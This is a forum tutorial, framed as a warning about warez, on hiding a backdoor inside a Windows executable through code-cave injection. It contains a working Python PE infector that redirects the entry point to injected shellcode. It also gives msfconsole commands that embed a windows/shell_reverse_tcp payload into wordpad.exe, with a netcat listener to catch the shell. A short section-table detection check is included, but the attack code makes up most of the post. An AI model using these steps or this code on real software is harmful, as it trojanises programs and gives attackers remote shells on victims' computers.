Some people tend to download and run programs without much concern. Some even download warez, keygens and cracks, just to find out that they got a shareware program for free. Wow! But think about it: if you wanted to install backdoors (or any other malware), warez would be a great way of getting them installed.
So what is a backdoor? It is usually thought of as a means for someone remote to get access to your computer: either a listening port for someone to connect to (a bind shell), an outbound connection that hands a shell to a remote listening port (a reverse shell), or some other way of granting unauthorized users access. The protocol the shell is carried over can of course vary and is limited only by creativity and skill (TCP, DNS, ICMP, etc.).
So how do you get shellcode? Get Metasploit; it has lots of payloads that you can generate after setting a few options. When you have your shellcode, you need to inject it into a program (infect it). Basically, code injection is about:
- Locate a place with enough 00 bytes inside the PE image to hold the shellcode (a code cave). The cave must lie in a section that is executable at runtime.
- Identify the OEP (original entry point) and overwrite the first instructions there with a jump to the code cave.
- Place the original instructions that were overwritten at the OEP in the cave, in front of the shellcode. Move whole instructions: a jmp rel32 is 5 bytes, so you displace at least 5 bytes, rounded up to an instruction boundary, and NOP-pad any leftover bytes.
- At the end of the shellcode, put a jump back to the instruction right after the jump that pointed to the shellcode (OEP plus the length of the displaced instructions; for the 5-byte jmp alone that is OEP+5).
- Now program execution jumps to the shellcode immediately when the program starts, and returns to normal execution when the shellcode is finished (a debugger is useful for checking this).
The module works great most of the time, but has a few bugs. My experience is that sometimes the infected program crashes. So with this tool it is now a no-brainer to create an effective backdoor. So don't you think it's a great way to install such backdoors, hiding them inside cracks or pre-cracked programs? Sure it is! And that was the main purpose of this thread: to show why warez may be devastating to you or your system (not forgetting the legal issues). Maybe it is not even limited to warez, so think about it next time you download and execute something you don't really know. Other tutorials may cover how to make such exes undetectable by AV, using other modules in Metasploit. However, that would not affect the easy section-table detection trick.
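The five steps above, and the section-table check mentioned just before, as an added example in Python; this is not the Metasploit module or any tool from this thread. Everything in it is an assumption for illustration: the function names (parse_pe, find_code_cave, infect, check_sections), the constructed one-section sample PE that build_sample_pe assembles in memory, the four-NOP placeholder SHELLCODE standing in for real "generate -t raw" output, the pushad/popad wrapper around the payload (which assumes the payload returns with a balanced stack; the post does not mention it), the caller-supplied displaced_len (splitting at an instruction boundary needs a disassembler, which this script does not include), and the exact rule of the check (sections marked both writable and executable, plus an entry point outside every executable section), since the post names the trick but not its rule. Only 32-bit PE files are handled.

```python
import struct
IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE = 0x00000020, 0x20000000
IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE = 0x40000000, 0x80000000
SHELLCODE = b"\x90\x90\x90\x90"  # constructed stand-in for "generate -t raw" output, not a real payload

def parse_pe(data):
    """Return (offset of the PE signature, list of section-header dicts); PE32 only."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ header")
    pe = struct.unpack_from("<I", data, 0x3C)[0]
    if data[pe:pe + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    nsec = struct.unpack_from("<H", data, pe + 6)[0]
    opt_size = struct.unpack_from("<H", data, pe + 20)[0]
    if struct.unpack_from("<H", data, pe + 24)[0] != 0x10B:
        raise ValueError("only 32-bit (PE32) images are handled here")
    sections = []
    for i in range(nsec):
        off = pe + 24 + opt_size + 40 * i
        name, vsize, va, rawsize, rawptr = struct.unpack_from("<8sIIII", data, off)
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"),
                         "vsize": vsize, "va": va, "rawsize": rawsize, "rawptr": rawptr,
                         "chars": struct.unpack_from("<I", data, off + 36)[0], "hdr_off": off})
    return pe, sections

def contains_rva(s, rva):
    return s["va"] <= rva < s["va"] + max(s["vsize"], s["rawsize"])

def find_code_cave(data, sections, size):
    """Step 1: first run of `size` zeros (plus one leading zero as padding) in the part of an
    executable section that is both on disk and mapped; returns (file offset, section)."""
    for s in sections:
        if not s["chars"] & IMAGE_SCN_MEM_EXECUTE:
            continue
        run = 0
        for i in range(min(s["vsize"], s["rawsize"])):
            run = run + 1 if data[s["rawptr"] + i] == 0 else 0
            if run > size:
                return s["rawptr"] + i - size + 1, s
    raise ValueError("no code cave of %d bytes" % size)

def jmp_rel32(from_rva, to_rva):
    """Encode jmp rel32 (opcode E9); the displacement is relative to the next instruction."""
    return b"\xE9" + struct.pack("<i", to_rva - (from_rva + 5))

def infect(data, shellcode, displaced_len, make_writable=True):
    """Steps 2-5: jmp from the OEP into the cave, which runs the displaced instructions, pushad,
    the payload, popad, then jumps back to OEP+displaced_len. displaced_len must cover whole
    instructions (>= 5 bytes): read it off a disassembly of the OEP."""
    if displaced_len < 5:
        raise ValueError("need at least 5 bytes at the OEP for a jmp rel32")
    buf = bytearray(data)
    pe, sections = parse_pe(buf)
    oep_rva = struct.unpack_from("<I", buf, pe + 40)[0]  # AddressOfEntryPoint
    home = next(s for s in sections if contains_rva(s, oep_rva))
    oep_off = oep_rva - home["va"] + home["rawptr"]
    displaced = bytes(buf[oep_off:oep_off + displaced_len])
    stub_len = displaced_len + 1 + len(shellcode) + 1 + 5
    cave_off, sec = find_code_cave(buf, sections, stub_len)
    cave_rva = sec["va"] + (cave_off - sec["rawptr"])
    buf[cave_off:cave_off + stub_len] = (displaced + b"\x60" + shellcode + b"\x61"
                                         + jmp_rel32(cave_rva + stub_len - 5, oep_rva + displaced_len))
    # Hook the OEP; NOP-pad whatever is left of the displaced instructions.
    buf[oep_off:oep_off + displaced_len] = jmp_rel32(oep_rva, cave_rva) + b"\x90" * (displaced_len - 5)
    if make_writable:  # self-decoding payloads write to their own bytes; this is what the check sees
        struct.pack_into("<I", buf, sec["hdr_off"] + 36, sec["chars"] | IMAGE_SCN_MEM_WRITE)
    return bytes(buf)

def check_sections(data):
    """Section-table check: RWX sections, and an entry point outside every executable section."""
    pe, sections = parse_pe(data)
    rwx = IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_WRITE
    findings = ["RWX section %r at RVA %#x" % (s["name"], s["va"])
                for s in sections if (s["chars"] & rwx) == rwx]
    oep = struct.unpack_from("<I", data, pe + 40)[0]
    if not any(s["chars"] & IMAGE_SCN_MEM_EXECUTE and contains_rva(s, oep) for s in sections):
        findings.append("entry point %#x outside every executable section" % oep)
    return findings

def build_sample_pe():
    """Constructed PE32 with one .text section: 10 bytes of code at file offset 0x400 (RVA 0x1000),
    the remaining 0x1F6 bytes of the section zero-filled (the cave)."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)  # e_lfanew
    coff = struct.pack("<4sHHIIIHH", b"PE\0\0", 0x14C, 1, 0, 0, 0, 224, 0x102)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)  # PE32 magic
    struct.pack_into("<II", opt, 16, 0x1000, 0x1000)  # AddressOfEntryPoint, BaseOfCode
    struct.pack_into("<III", opt, 28, 0x400000, 0x1000, 0x200)  # ImageBase, SectionAlignment, FileAlignment
    struct.pack_into("<II", opt, 56, 0x2000, 0x400)  # SizeOfImage, SizeOfHeaders
    sec = struct.pack("<8sIIIIIIHHI", b".text", 0x200, 0x1000, 0x200, 0x400, 0, 0, 0, 0,
                      IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ)
    code = b"\x55\x8b\xec\x83\xec\x10\x33\xc0\xc9\xc3"  # push ebp; mov ebp,esp; sub esp,0x10; xor eax,eax; leave; ret
    return (bytes(dos) + coff + bytes(opt) + sec).ljust(0x400, b"\0") + code.ljust(0x200, b"\0")

if __name__ == "__main__":
    clean = build_sample_pe()
    bad = infect(clean, SHELLCODE, displaced_len=6)  # the first three instructions are 6 bytes
    print("clean   :", check_sections(clean) or "no findings")
    print("infected:", check_sections(bad))
```

Run as-is it reports no findings for the clean sample and one RWX finding for the infected copy. On a real file you would pass the bytes of the raw.bin from "generate -t raw" as the shellcode and take displaced_len from a disassembler listing of the OEP; the check is deliberately crude, so expect false positives from packers and some compilers that also mark code sections writable.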
In my test I ran Metasploit v4.3.0-dev.14649. Using the browser GUI apparently required a license, so I just used msfconsole, which has always worked great.
help
show payloads
use windows/shell_reverse_tcp  (use a payload)
info  (info on usage)
set lhost 127.0.0.1  (set variable)
set lport 4444  (set variable)
generate -h  (help on payload generation)
generate -k -t exe -x wordpad.exe -f wordpad_mod.exe  (template param -x: templates are looked up in msf3\data\templates; output param -f: written under msf3\)
generate -t raw -f raw.bin  (can be launched in my ShellCodeExecGUI)
nc -l -p 4444  (for testing with netcat whether our modified wordpad_mod.exe works)
You may wonder why lhost and lport with a reverse shell. I guess there's an error in the module and it should say rhost and rport, so never mind; just think of l* as r* for this particular payload.
Also, I thought a Windows tutorial was about time, as most if not all are Linux based.
Edit: Tools posted in this thread are now put into the reboot download section: http://reboot.pro/16550/